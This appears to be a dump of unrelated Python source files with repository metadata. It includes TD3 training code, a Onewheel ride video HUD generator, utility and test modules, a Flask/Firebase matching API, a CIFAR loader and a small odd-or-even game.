[critic_loss1, critic_loss2, self.actor_loss], td_error @tf.contrib.eager.defun def _train_critic(self, bs, eval_act_index, done, bs_, reward, p_idx, weights, noise_clip=0.5): with tf.device(self.device): global_step = tf.train.get_or_create_global_step() noise = tf.clip_by_value(tf.random.normal(shape=[self.batch_size,1],mean=0.0, stddev=0.2) , -noise_clip, noise_clip) next_action = tf.clip_by_value(self.actor_target.inference(bs_) + noise, -self.max_action, self.max_action) critic_next1, critic_next2 = self.critic_target1.inference([bs_, next_action]), self.critic_target2.inference([bs_, next_action]) critic_next = tf.minimum(critic_next1, critic_next2) target_Q = reward + self.discount ** tf.cast(p_idx, tf.float32) * critic_next * (1. - done) target_Q = tf.stop_gradient(target_Q) # update critic_net1 with tf.GradientTape() as tape: critic_eval1 = self.critic1.inference([bs, eval_act_index]) error = tf.losses.huber_loss(labels=target_Q, predictions=critic_eval1) td_error = tf.abs(tf.reduce_mean(target_Q - critic_eval1, axis=1)) critic_loss1 = tf.reduce_mean(error * weights, keepdims=True) self.critic1.optimize(critic_loss1, global_step, tape) with tf.GradientTape() as tape: critic_eval2 = self.critic2.inference([bs, eval_act_index]) critic_loss2 = tf.reduce_mean(tf.losses.huber_loss(labels=target_Q, predictions=critic_eval2) * weights, keepdims=True) self.critic2.optimize(critic_loss2, global_step, tape) return critic_loss1, critic_loss2, td_error @tf.contrib.eager.defun def _train_actor(self, bs): with tf.device(self.device): global_step = tf.train.get_or_create_global_step() # update actor_net with tf.GradientTape() as tape: actor_eval = tf.cast(self.actor.inference(bs), tf.float32) self.actor_loss = -tf.reduce_mean(self.critic1.inference([bs, actor_eval])) self.actor.optimize(self.actor_loss, global_step, tape) # check to replace target parameters self.update_target_net() return self.actor_loss def update_target_net(self): # update critic_target_net1 for param, target_param in zip(self.critic1.weights, self.critic_target1.weights): target_param.assign(self.tau * param + (1 - self.tau) * target_param) # update critic_target_net2 for param, target_param in zip(self.critic2.weights, self.critic_target2.weights): target_param.assign(self.tau * param + (1 - self.tau) * target_param) # update actor_target_net for param, target_param in zip(self.actor.weights, self.actor_target.weights): target_param.assign(self.tau * param + (1 - self.tau) * target_param) return
2.125
2
src/OnewheelHudVideo.py
wmaciel/video-hud
5
12789687
# -*- coding: utf-8 -*- from datetime import timedelta import tqdm from moviepy.editor import * from IconManager import IconManager import LogParser resolution_map = { '1080': { 'portrait': {'w': 1080, 'h': 1920}, 'landscape': {'w': 1920, 'h': 1080} }, '720': { 'portrait': {'w': 720, 'h': 1280}, 'landscape': {'w': 1280, 'h': 720} } } class OnewheelHudVideo: def __init__(self, data_path, footage_path, orientation='portrait', resolution='1080', start_second=0, start_date=None, end_second=None, unit='mm', out_path='onewheel.MP4'): self.footage_path = footage_path self.orientation = orientation self.resolutions = compute_resolutions(orientation, resolution) self.start_second = start_second self.end_second = end_second self.icon_manager = IconManager(resolution=res_2_tuple(self.resolutions['icon']), unit='metric' if unit[1] == 'm' else 'imperial') self.data = LogParser.parse(data_path, unit) self.start_date = LogParser.parse_millisecond_time(start_date) self.out_path = out_path print 'Footage is coming from', self.footage_path print 'Footage orientation is', self.orientation print 'Resolutions are:' print self.resolutions def render(self): print 'Generating footage clip...' footage_clip = self.generate_footage_clip() print 'Generating info clip...' info_clip = self.generate_fps_info_clip(footage_clip, self.start_date) print 'Generating final clip...' final_clip = CompositeVideoClip([footage_clip, info_clip.set_position('bottom', 'center')]) print 'Rendering...' final_clip.write_videofile(self.out_path, fps=60, threads=8) # final_clip.preview(fps=60, audio=False) # final_clip.save_frame(filename="frame.png", t=10.669) def generate_fps_info_clip(self, footage, start_date): icon_clips = { 'speed': [], 'pitch': [], 'roll': [], 'battery': [], 'temperature': [] } frame_duration = 1.0/footage.fps last_id = 0 for t in tqdm.tqdm(f_range(0, footage.duration, frame_duration)): row, last_id = interpolate_from_data(self.data, timedelta(seconds=t), start_date, last_id) icon_clips['speed'].append(self.icon_manager.get_animated_speed_icon_clip(speed=row['speed'], duration=frame_duration)) icon_clips['pitch'].append(self.icon_manager.get_pitch_icon_clip(angle=row['pitch'], duration=frame_duration)) icon_clips['roll'].append(self.icon_manager.get_roll_icon_clip(angle=row['roll'], duration=frame_duration)) icon_clips['battery'].append(self.icon_manager.get_battery_icon_clip(charge=row['battery'], duration=frame_duration)) icon_clips['temperature'].append(self.icon_manager.get_temperature_icon_clip(temperature=row['motor_temp'], duration=frame_duration)) print 'Combining icons...' info_clip = self.combine_info_clips(icon_clips) return info_clip def compute_log_delay(self, i): delta_t = self.data[i + 1]['time'] - self.data[i]['time'] delta_seconds = delta_t.seconds + delta_t.microseconds * 1e-6 return delta_seconds def generate_time_clip(self): time_clips = [] for row in tqdm.tqdm(self.data[:300]): time_str = '{}'.format(row['time']) time_clips.append(TextClip(time_str, fontsize=64, color='red').set_duration(self.avg_log_delay)) return concatenate_videoclips(time_clips) def combine_info_clips(self, icon_clips): # combine clips by info full_icon_clips = [ concatenate_videoclips(icon_clips['speed']), concatenate_videoclips(icon_clips['pitch']), concatenate_videoclips(icon_clips['roll']), concatenate_videoclips(icon_clips['battery']), concatenate_videoclips(icon_clips['temperature']) ] # combine info clips into a bar if self.orientation == 'portrait': # make a horizontal bar return clips_array([full_icon_clips]) elif self.orientation == 'landscape': # transpose full_icon_clips vertical_array = [ [full_icon_clips[0]], [full_icon_clips[1]], [full_icon_clips[2]], [full_icon_clips[3]], [full_icon_clips[4]] ] # make a vertical bar return clips_array(vertical_array) else: raise Exception("Orientation not set") def generate_footage_clip(self): footage_clip = (VideoFileClip(self.footage_path) .resize(res_2_tuple(self.resolutions['footage']))) footage_clip = footage_clip.subclip(t_start=self.start_second, t_end=self.end_second) if self.orientation == 'portrait': footage_clip = footage_clip.rotate(-90) return footage_clip def compute_resolutions(orientation, resolution_name): resolution = resolution_map[resolution_name][orientation] resolutions = {} n_icons = 5 # the footage is the same as the full resolution resolutions['footage'] = resolution # in portrait, the icons will be layed along the bottom edge if orientation == 'portrait': resolutions['icon'] = { 'w': resolution['w'] / float(n_icons), 'h': resolution['w'] / float(n_icons) } # in landscape, the icons will be laid along the right edge else: # orientation == landscape resolutions['icon'] = { 'w': resolution['h'] / float(n_icons), 'h': resolution['h'] / float(n_icons) } return resolutions def interpolate_from_data(data, delta_t, start_date, last_id=0): # find between which rows is t in t = delta_t + start_date id_1 = None id_2 = None for i, row in enumerate(data[last_id:]): if row['time'] >= t: id_2 = i + last_id id_1 = id_2 - 1 break # find interpolation offset x d1 = data[id_1]['time'] d2 = data[id_2]['time'] x = (t - d1).total_seconds() / (d2 - d1).total_seconds() # use x offset to interpolate attributes row = {'time': t} r1 = data[id_1] r2 = data[id_2] for item in r1.items(): if item[0] != 'time': a1 = r1[item[0]] a2 = r2[item[0]] if a1 is None or a2 is None: row[item[0]] = None else: row[item[0]] = (a2 - a1) * x + a1 return row, id_2 def compute_average_delta_t(data): deltas_s = [] for i, row in enumerate(data): if i + 1 < len(data): delta_t = data[i + 1]['time'] - row['time'] deltas_s.append(round(delta_t.seconds + delta_t.microseconds * 1e-6, 2)) return sum(deltas_s) / len(deltas_s) def res_2_tuple(resolution): """ Converts a resolution map to a tuple """ return resolution['h'], resolution['w'] def f_range(start, stop, step): """" Implementation of the range built-in range function using floating point numbers as shown at: https://www.pythoncentral.io/pythons-range-function-explained/ """ i = start while i < stop: yield i i += step if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Generates a HUD video of your onewheel ride from a log file') parser.add_argument('log_file', type=str, help='Path to the logfile used to annotate the video') parser.add_argument('video_file', type=str, help='Path to the video to be annotated') parser.add_argument('--start-second', type=float, default=0, help='Which second of the original footage should the final video start from') parser.add_argument('--start-date', type=str, default='0', help='Timestamp at the moment of the frame on start_second') parser.add_argument('--end-second', type=float, default=None, help='Which second of the original footage the the final video end at') parser.add_argument('--unit', type=str, default='mm', choices=['mm', 'mi', 'im', 'ii'], help='Defines input output unit conversion with two letters. The first denotes the input unit ' 'and the second denotes the output unit.') parser.add_argument('--output-file', '-o', type=str, help='Path the output file. If none is given a file called onewheel.MP4 will be created on the ' 'directory the script if being run.') args = parser.parse_args() onewheel_video = OnewheelHudVideo(args.log_file, args.video_file, start_second=args.start_second, start_date=args.start_date, end_second=args.end_second, unit=args.unit, out_path=args.output_file) onewheel_video.render()
2.359375
2
tests/gravity_support_objects_test.py
NextCenturyCorporation/mcs-scene-generator
4
12789688
from generator import ( DefinitionDataset, ObjectDefinition, gravity_support_objects, ) def test_getters_reuse_immutable_dataset(): dataset_1 = ( gravity_support_objects.get_symmetric_target_definition_dataset( unshuffled=True ) ) dataset_2 = ( gravity_support_objects.get_symmetric_target_definition_dataset( unshuffled=True ) ) assert dataset_1 is dataset_2 assert isinstance(dataset_1, DefinitionDataset) def test_does_have_definitions(): dataset = gravity_support_objects.get_asymmetric_target_definition_dataset( unshuffled=True ) definitions = dataset.definitions() assert len(definitions) > 0 for definition in definitions: assert isinstance(definition, ObjectDefinition) dataset = gravity_support_objects.get_symmetric_target_definition_dataset( unshuffled=True ) definitions = dataset.definitions() assert len(definitions) > 0 for definition in definitions: assert isinstance(definition, ObjectDefinition) output = gravity_support_objects.get_visible_support_object_definition() assert isinstance(output, ObjectDefinition) def test_create_pole_template(): pole = gravity_support_objects.create_pole_template(1) assert pole['shows'][0]['stepBegin'] == 1 assert pole['moves'][0]['stepBegin'] == 1 pole = gravity_support_objects.create_pole_template(100) assert pole['shows'][0]['stepBegin'] == 100 assert pole['moves'][0]['stepBegin'] == 100
2.25
2
utils/utils.py
lovish1234/TPC
0
12789689
<gh_stars>0 # calculate average, confusion matrix, accruacy import torch import numpy as np import os import ntpath import sys from datetime import datetime import glob import matplotlib.pyplot as plt plt.switch_backend('agg') from collections import deque from tqdm import tqdm from torchvision import transforms def save_checkpoint(state, is_best=0, filename='models/checkpoint.pth.tar', save_every=10): # save after every few epochs if state['epoch'] % save_every == 0: torch.save(state, filename) # last_epoch_path = os.path.join(os.path.dirname(filename), # 'epoch%s.pth.tar' % str(state['epoch']-gap)) # if not keep_all: # try: os.remove(last_epoch_path) # except: pass if is_best: past_best = glob.glob(os.path.join( os.path.dirname(filename), 'model_best_*.pth.tar')) for i in past_best: try: os.remove(i) except: pass torch.save(state, os.path.join(os.path.dirname(filename), 'model_best_epoch%s.pth.tar' % str(state['epoch']))) def write_log(content, epoch, filename): if not os.path.exists(filename): log_file = open(filename, 'w') else: log_file = open(filename, 'a') log_file.write('## Epoch %d:\n' % epoch) log_file.write('time: %s\n' % str(datetime.now())) log_file.write(content + '\n\n') log_file.close() def calc_topk_accuracy(output, target, topk=(1,)): ''' Modified from: https://gist.github.com/agermanidis/275b23ad7a10ee89adccf021536bb97e Given predicted and ground truth labels, calculate top-k accuracies. ''' maxk = max(topk) batch_size = target.size(0) # take the indices of topk values values, pred = output.topk(maxk, 1, True, True) #print (values[0], pred[0]) pred = pred.t() #print (pred, type(pred), pred.shape) correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0) res.append(correct_k.mul_(1 / batch_size)) return res def calc_bottomk_accuracy(output, target, topk=(1,)): ''' Modified from: https://gist.github.com/agermanidis/275b23ad7a10ee89adccf021536bb97e Given predicted and ground truth labels, calculate top-k accuracies. ''' maxk = max(topk) batch_size = target.size(0) # take the indices of topk values values, pred = output.topk(maxk, 1, False, True) #print (values[0], pred[0]) pred = pred.t() #print (pred, type(pred), pred.shape) correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0) res.append(correct_k.mul_(1 / batch_size)) return res def calc_accuracy(output, target): ''' output: (B, N) or list thereof; target: (B) or list thereof. Supports multi-type classification as well, returning joint accuracy as the last item. ''' if isinstance(output, list) and len(output) >= 2: # Multiple class types accuracies = [] preds = [] for cur_out, cur_tar in zip(output, target): cur_tar = cur_tar.squeeze() _, cur_pred = torch.max(cur_out, dim=1) cur_acc = torch.mean((cur_pred == cur_tar).float()).item() accuracies.append(cur_acc) preds.append(cur_pred) # Calculate joint accuracy as well B = output[0].shape[0] class_divisions = len(output) both_correct = 0 for i in range(B): if np.all([preds[k][i].item() == target[k][i].item() for k in range(class_divisions)]): both_correct += 1 joint_acc = both_correct / B accuracies.append(joint_acc) return accuracies else: # Single class type if isinstance(output, list): output = output[0] target = target[0] target = target.squeeze() _, pred = torch.max(output, 1) return torch.mean((pred == target).float()) def calc_accuracy_binary(output, target): '''output, target: (B, N), output is logits, before sigmoid ''' pred = output > 0 acc = torch.mean((pred == target.byte()).float()) del pred, output, target return acc def denorm(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]): assert len(mean) == len(std) == 3 inv_mean = [-mean[i] / std[i] for i in range(3)] inv_std = [1 / i for i in std] return transforms.Normalize(mean=inv_mean, std=inv_std) def get_action_from_frame(map_action_frame, vpath, frame_index): # frame_id = vpath.split('/')[-1] + '_' + str(frame_index) video_id = ntpath.basename(vpath).split('.')[0] # remove path & extension, if any frame_id = video_id + '_' + str(frame_index) action = map_action_frame.get(frame_id, None) if action == None: return 'None' + ' ' + 'None' else: return action.get_action() class single_action: x = 5 def __init__(self, verb, noun): self.verb = verb self.noun = noun def get_action(self): return(self.verb + ' ' + self.noun) def get_verb(self): return self.verb def get_noun(self): return self.noun class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 self.local_history = deque([]) self.local_avg = 0 self.history = [] self.dict = {} # save all data values here self.save_dict = {} # save mean and std here, for summary table def update(self, val, n=1, history=0, step=64): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count if history: self.history.append(val) if step > 0: self.local_history.append(val) if len(self.local_history) > step: self.local_history.popleft() self.local_avg = np.average(self.local_history) def dict_update(self, val, key): if key in self.dict.keys(): self.dict[key].append(val) else: self.dict[key] = [val] def __len__(self): return self.count class AccuracyTable(object): '''compute accuracy for each class''' def __init__(self): self.dict = {} def update(self, pred, tar): pred = torch.squeeze(pred) tar = torch.squeeze(tar) for i, j in zip(pred, tar): i = int(i) j = int(j) if j not in self.dict.keys(): self.dict[j] = {'count': 0, 'correct': 0} self.dict[j]['count'] += 1 if i == j: self.dict[j]['correct'] += 1 def print_table(self, label): for key in self.dict.keys(): acc = self.dict[key]['correct'] / self.dict[key]['count'] print('%s: %2d, accuracy: %3d/%3d = %0.6f' % (label, key, self.dict[key]['correct'], self.dict[key]['count'], acc)) class ConfusionMeter(object): '''compute and show confusion matrix''' def __init__(self, num_class): self.num_class = num_class self.mat = np.zeros((num_class, num_class)) self.precision = [] self.recall = [] def update(self, pred, tar): pred, tar = pred.cpu().numpy(), tar.cpu().numpy() pred = np.squeeze(pred) tar = np.squeeze(tar) for p, t in zip(pred.flat, tar.flat): self.mat[p][t] += 1 def print_mat(self): print('Confusion Matrix: (target in columns)') print(self.mat) def plot_mat(self, path, dictionary=None, annotate=False): plt.figure(dpi=600) plt.imshow(self.mat, cmap=plt.cm.jet, interpolation=None, extent=(0.5, np.shape(self.mat)[0] + 0.5, np.shape(self.mat)[1] + 0.5, 0.5)) width, height = self.mat.shape if annotate: for x in range(width): for y in range(height): plt.annotate(str(int(self.mat[x][y])), xy=(y + 1, x + 1), horizontalalignment='center', verticalalignment='center', fontsize=8) if dictionary is not None: plt.xticks([i + 1 for i in range(width)], [dictionary[i] for i in range(width)], rotation='vertical') plt.yticks([i + 1 for i in range(height)], [dictionary[i] for i in range(height)]) plt.xlabel('Ground Truth') plt.ylabel('Prediction') plt.colorbar() plt.tight_layout() plt.savefig(path, format='svg') plt.clf() # for i in range(width): # if np.sum(self.mat[i,:]) != 0: # self.precision.append(self.mat[i,i] / np.sum(self.mat[i,:])) # if np.sum(self.mat[:,i]) != 0: # self.recall.append(self.mat[i,i] / np.sum(self.mat[:,i])) # print('Average Precision: %0.4f' % np.mean(self.precision)) # print('Average Recall: %0.4f' % np.mean(self.recall)) class data_prefetcher: ''' Open a cuda side stream to prefetch data from next iteration, this process is overlapping with forward pass in the model, thus accelerating dataloading process. NOTE: 1. a cuda variable specifying cuda device and a dataloader is required as an input 2. pin_memory in the datalaoder needs to be set to True before passed in ''' def __init__(self, loader, cuda): self.loader = iter(loader) self.stream = torch.cuda.Stream() self.preload(cuda) def preload(self, cuda): try: self.input_dict = next(self.loader) self.input_seq = self.input_dict['t_seq'] except StopIteration: self.input_dict = None self.input_seq = None return with torch.cuda.stream(self.stream): self.input_seq = self.input_seq.to(cuda, non_blocking=True) def next(self, cuda): torch.cuda.current_stream().wait_stream(self.stream) input_dict = self.input_dict input_seq = self.input_seq self.preload(cuda) return input_dict, input_seq
2.109375
2
chat_match/__init__.py
Latiosu/chat-match
0
12789690
<gh_stars>0 __version__ = '0.1.0' import firebase_admin from firebase_admin import credentials, firestore from flask import Flask from flask_restful import Resource, Api, reqparse from datetime import datetime, timezone import random import re import string import uuid from uuid import UUID # Use a service account cred = credentials.Certificate('firebase-secret.json') firebase_admin.initialize_app(cred) db = firestore.client() app = Flask(__name__) api = Api(app) class Graphs(Resource): """Graphs containing nodes and edges""" def get(self): graphs_ref = db.collection('graphs') parser = reqparse.RequestParser() parser.add_argument('graph_id', required=False) args = parser.parse_args() graph_id = args['graph_id'] if graph_id is not None and self.is_valid_graph_id(graph_id): graph = graphs_ref.document(graph_id).get() if graph.exists: return {'data': graph.to_dict()}, 200 else: return {'message': f'No such graph with id {graph_id}'}, 401 else: query = graphs_ref.order_by('created').limit(50) res = {} count = 0 for graph in query.stream(): res[graph.id] = graph.to_dict() return {'data': res}, 200 def post(self): graphs_ref = db.collection('graphs') parser = reqparse.RequestParser() parser.add_argument('names', required=True, help="names parameter required") args = parser.parse_args() names = self.filter_names(args['names'].split(',')) # Generate graph identifier success = False attempt = 0 graph_id = None while not success and attempt < 3: graph_id = self.generate_identifier() attempt += 1 if not graphs_ref.document(graph_id).get().exists: success = True if graph_id is None: return {'message': f'Unable to generate graph, please try again later'}, 500 # Build initial graph graph = { 'graph_id': graph_id, 'created': str(datetime.now(timezone.utc)), 'events': [], 'nodes': [{'node_id': i, 'name': name, 'edges': []} for i, name in enumerate(names)] } graphs_ref.document(graph_id).set(graph) return {'graph_id': graph_id}, 200 def delete(self): graphs_ref = db.collection('graphs') events_ref = db.collection('events') parser = reqparse.RequestParser() parser.add_argument('graph_id', required=True, help="graph_id parameter required") args = parser.parse_args() graph_id = args['graph_id'] if not self.is_valid_graph_id(graph_id): return {'message': f'Invalid graph id {graph_id}'}, 400 graph = graphs_ref.document(graph_id).get() if not graph.exists: return {'message': f'No such graph with id {graph_id}'}, 404 for event in events_ref.where('graph_id', '==', graph_id).stream(): events_ref.document(event.to_dict()['event_id']).delete() graphs_ref.document(graph_id).delete() return {'message': f'Deleted graph and events with graph_id {graph_id}'}, 200 def is_valid_graph_id(self, graph_id): cleaned = re.sub('[^A-Z]', '', graph_id).strip() if len(cleaned) != 4: return False return True def filter_names(self, names): filtered_names = [] for name in names: cleaned = re.sub('[^a-zA-Z0-9 ]', '', name).strip() if len(cleaned) > 0 and cleaned not in filtered_names: filtered_names.append(cleaned) return filtered_names def generate_identifier(self): return "".join(random.sample(list(string.ascii_uppercase), k=4)) class Events(Resource): """Instances of matching events""" def get(self): events_ref = db.collection('events') parser = reqparse.RequestParser() parser.add_argument('event_id', required=False) parser.add_argument('graph_id', required=False) args = parser.parse_args() event_id = args['event_id'] graph_id = args['graph_id'] if (event_id is not None and graph_id is not None) \ or (event_id is None and graph_id is None): return {'message': f'One of either graph_id or event_id is required'}, 400 elif event_id is not None and self.is_valid_event_id(event_id): event = events_ref.document(event_id).get() if event.exists: return {'data': event.to_dict()}, 200 else: return {'message': f'No such event with id {event_id}'}, 401 elif graph_id is not None and self.is_valid_graph_id(graph_id): query = events_ref.where('graph_id', '==', graph_id).order_by('created') res = [] for event in query.stream(): res.append(event.to_dict()) return {'data': res}, 200 else: return {'message': f'Invalid graph_id or event_id given'}, 400 def post(self): graphs_ref = db.collection('graphs') events_ref = db.collection('events') parser = reqparse.RequestParser() parser.add_argument('graph_id', required=True) parser.add_argument('ignore_ids', required=False) args = parser.parse_args() graph_id = args['graph_id'] # names = self.filter_ids(args['ignore_ids'].split(',')) if not self.is_valid_graph_id(graph_id): return {'message': f'Invalid graph id {graph_id}'}, 400 graph = graphs_ref.document(graph_id).get() if not graph.exists: return {'message': f'No such graph with id {graph_id}'}, 401 # Compute changes and persist res = self.algorithm(graph.to_dict(), graph_id) if res is None: return {'message': f'Insufficient nodes to match, at least 2 required'}, 401 graphs_ref.document(graph_id).set(res['graph']) events_ref.document(str(res['event_id'])).set(res['event']) return {'data': res['event']}, 200 def algorithm(self, graph, graph_id, match_odd=False): """Computes matches and returns updated graph + event.""" N = len(graph['nodes']) if N < 2: return None # Parse input data matrix = [[False for i in range(N)] for j in range(N)] for nodeId, node in enumerate(graph['nodes']): matrix[nodeId][nodeId] = True # Ignore self for edge in node['edges']: matrix[nodeId][edge] = True # Undirected edge exists matrix[edge][nodeId] = True assigned = [] edges = [] # TODO: Handle matching odd number of nodes # Find and record new edges, one edge per node for nodeId, node in enumerate(graph['nodes']): if nodeId not in assigned: for otherId in range(0,N): if otherId not in assigned and not matrix[nodeId][otherId]: assigned.append(nodeId) assigned.append(otherId) edges.append({ 'node_a': nodeId, 'node_b': otherId, 'name_a': node['name'], 'name_b': graph['nodes'][otherId]['name'] }) node['edges'].append(otherId) graph['nodes'][otherId]['edges'].append(nodeId) matrix[nodeId][otherId] = True matrix[otherId][nodeId] = True break event_id = str(uuid.uuid4()) event = { 'event_id': event_id, 'graph_id': graph_id, 'created': str(datetime.now(timezone.utc)), 'edges': edges } graph['events'].append(event_id) return {'graph': graph, 'event_id': event_id, 'event': event} def is_valid_graph_id(self, graph_id): cleaned = re.sub('[^A-Z]', '', graph_id).strip() if len(cleaned) != 4: return False return True def is_valid_event_id(self, event_id): try: uuid_obj = UUID(event_id, version=4) except ValueError: return False return str(uuid_obj) == event_id class Nodes(Resource): """Representation of a user in a graph""" def get(self): """Get node in graph""" graphs_ref = db.collection('graphs') parser = reqparse.RequestParser() parser.add_argument('graph_id', required=True) parser.add_argument('node_id', required=True) args = parser.parse_args() graph_id = args['graph_id'] node_id = args['node_id'] if not self.is_valid_graph_id(graph_id): return {'message': f'Invalid graph id {graph_id}'}, 401 graph = graphs_ref.document(graph_id).get() if not graph.exists: return {'message': f'No such graph with id {graph_id}'}, 404 if not self.is_valid_node_id(node_id): return {'message': f'Invalid node id {node_id}'}, 401 nodes = {node['node_id']:node for node in graph.to_dict()['nodes']} if int(node_id) not in nodes: return {'message': f'No such node in graph with id {node_id}'}, 404 else: return {'data': nodes[int(node_id)]}, 200 def post(self): """Add node to graph""" # TODO: Implement pass def put(self): """Update node in graph""" # TODO: Implement pass def delete(self): """Remove node from graph""" # TODO: Implement pass def is_valid_graph_id(self, graph_id): cleaned = re.sub('[^A-Z]', '', graph_id).strip() if len(cleaned) != 4: return False return True def is_valid_node_id(self, node_id): cleaned = re.sub('[^0-9]', '', node_id).strip() if len(cleaned) == 0: return False return True api.add_resource(Graphs, '/graphs') api.add_resource(Events, '/events') api.add_resource(Nodes, '/nodes') if __name__ == '__main__': app.run()
2.640625
3
tests/test_summary.py
ChielWH/prometheus_redis_client
19
12789691
<reponame>ChielWH/prometheus_redis_client<filename>tests/test_summary.py import re from unittest.mock import patch import pytest from .helpers import MetricEnvironment import prometheus_redis_client as prom class TestSummary(object): def test_interface_without_labels(self): with MetricEnvironment() as redis: summary = prom.Summary( name="test_summary", documentation="Summary documentation", ) summary.observe(1) group_key = summary.get_metric_group_key() assert sorted(redis.smembers(group_key)) == [ b'test_summary_count:e30=', b'test_summary_sum:e30=' ] assert int(redis.get('test_summary_count:e30=')) == 1 assert float(redis.get('test_summary_sum:e30=')) == 1 summary.observe(3.5) assert int(redis.get('test_summary_count:e30=')) == 2 assert float(redis.get('test_summary_sum:e30=')) == 4.5 assert prom.REGISTRY.output() == ( "# HELP test_summary Summary documentation\n" "# TYPE test_summary summary\n" "test_summary_count 2\n" "test_summary_sum 4.5" ) def test_interface_with_labels(self): with MetricEnvironment() as redis: summary = prom.Summary( name="test_summary", documentation="Summary documentation", labelnames=["host", "url", ], ) # need 'url' label with pytest.raises(ValueError, match=r"Expect define all labels: .*?\. Got only: host"): summary.labels(host="192.168.127.12").observe(3) # need use labels method with pytest.raises(Exception, match=r"Expect define all labels: .*?\. Got only: "): summary.observe(1) labels = dict(host="192.168.127.12", url="/home/") summary.labels(**labels).observe(2) group_key = summary.get_metric_group_key() assert sorted(redis.smembers(group_key)) == [ b'test_summary_count:<KEY>MTIzLjEyMyIsICJ1cmwiOiAiL2hvbWUvIn0=', b'test_summary_sum:<KEY> ] metric_sum_key = '<KEY> metric_count_key = '<KEY> assert int(redis.get(metric_count_key)) == 1 assert float(redis.get(metric_sum_key)) == 2 assert summary.labels(**labels).observe(3.1) == 5.1 assert int(redis.get(metric_count_key)) == 2 assert float(redis.get(metric_sum_key)) == 5.1 assert prom.REGISTRY.output() == ( '# HELP test_summary Summary documentation\n' '# TYPE test_summary summary\n' 'test_summary_count{host="192.168.127.12",url="/home/"} 2\n' 'test_summary_sum{host="192.168.127.12",url="/home/"} 5.1' ) @patch('prometheus_redis_client.base_metric.logger.exception') def test_silent_mode(self, mock_logger): """ If we have some errors while send metric to redis we should not stop usefull work. """ with MetricEnvironment(): summary = prom.Summary( name="test_summary", documentation="Summary documentation", ) def raised_exception_func(*args, **kwargs): raise Exception() with patch("prometheus_redis_client.REGISTRY.redis.pipeline") as mock: mock.side_effect = raised_exception_func summary.observe(1) assert mock_logger.called def test_timeit_wrapper(self): """Test `timeit` wrapper for Summary metric.""" with MetricEnvironment(): summary = prom.Summary( name="test_summary", documentation="Summary documentation", labelnames=['name'], ) @summary.timeit(name="Hi!") def simple_func(): import time time.sleep(0.01) return simple_func() assert prom.REGISTRY.output().startswith( '# HELP test_summary Summary documentation\n' '# TYPE test_summary summary\n' 'test_summary_count{name="Hi!"} 1\n' 'test_summary_sum{name="Hi!"} 0.01' )
2.140625
2
tests/context.py
rreben/zettelkasten_tools
1
12789692
<filename>tests/context.py<gh_stars>1-10 # context.py import sys import os sys.path.insert(0, os.path.abspath( os.path.join(os.path.dirname(__file__), '..'))) import tools4zettelkasten # noqa # pylint: disable=unused-import, wrong-import-position
1.421875
1
data_loader/cifar_data_loader.py
david-riser/cifar-deepcluster
0
12789693
<filename>data_loader/cifar_data_loader.py from base.base_data_loader import BaseDataLoader from utils.factory import create from tensorflow.keras.datasets import cifar10 from tensorflow.keras.preprocessing.image import ImageDataGenerator class CifarDataLoader(BaseDataLoader): def __init__(self, config): super(CifarDataLoader, self).__init__(config) if 'preprocessing_function' in self.config.data_loader.toDict(): self.preprocess_func = create("tensorflow.keras.applications.{}".format( self.config.data_loader.preprocessing_function)) else: self.preprocess_func = lambda x: x / 255. self.load() self.preprocess() def load(self): (self.X_train, self.y_train), (self.X_test, self.y_test) = cifar10.load_data() self.X_train = self.X_train.reshape((-1, 32, 32, 3)) self.X_test = self.X_test.reshape((-1, 32, 32, 3)) self.X_train = self.X_train.astype('float') self.X_test = self.X_test.astype('float') self.train_gen = ImageDataGenerator(preprocessing_function=self.preprocess_func) self.train_flow = self.train_gen.flow( self.X_train, self.y_train, batch_size=self.config.data_loader.batch_size, ) self.test_gen = ImageDataGenerator(preprocessing_function=self.preprocess_func) self.test_flow = self.test_gen.flow( self.X_test, self.y_test, batch_size=self.config.data_loader.batch_size, ) def preprocess(self): if self.preprocess_func: print("Applying preprocessing to test set.") self.X_test = self.preprocess_func(self.X_test) def get_train_flow(self): return self.train_flow def get_test_flow(self): return self.test_flow def get_test_data(self): return (self.X_test, self.y_test)
2.75
3
Chapter 08/ch8_36.py
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
0
12789694
<filename>Chapter 08/ch8_36.py nums1 = [1, 2, 3] nums2 = [4, 5] nums=[(x,y) for x in nums1 for y in nums2] print(nums) #[(1,4), (1,5), (2,4), (2,5), (3,4), (3,5)]
3.78125
4
Par_Impar_Jogo.py
cafesao/Programas_Python
1
12789695
# Este programa funciona como um jogo de Par ou Impár, com varios if dentro de uma estrutura # de repetição com uma flag import random j1 = c2 = re = pi = 0 lista1 = [2,4] lista2 = [1,3,5] lista3 = [1, 2, 3, 4, 5] stop = '' print('Este e a brincadeira do Par ou Impár!') while True: j1 = int(input('\nDigite um valor de 1 a 5: ')) if j1 in lista1: pi = 1 # Pi = Ele diz ao programa se o user escolheu par ou impar c2 = random.choice(lista3) if j1 in lista2: pi = 2 # Pi = Ele diz ao programa se o user escolheu par ou impar c2 = random.choice(lista3) re = j1 + c2 if (re%2) == 0: if pi == 1: print(f'Você ganhou! o resultado foi {re}, o computador escolheu {c2}') if pi == 2: print(f'Você perdeu, o resultado foi {re}, o computador escolheu {c2}') else: if pi == 2: print(f'Você ganhou! o resultado foi {re}, o computador escolheu {c2}') if pi == 1: print(f'Você perdeu, o resultado foi {re}, o computador escolheu {c2}') stop = str(input('\nDeseja recomeçãr? (S - SIM / N - NÃO): ').split()[0].upper()) if stop in 'N': break print('\nObrigado por utilizar o jogo do Par ou Impár')
3.8125
4
opencv_test1/demo/7.py
18970738669/opencv_demo
1
12789696
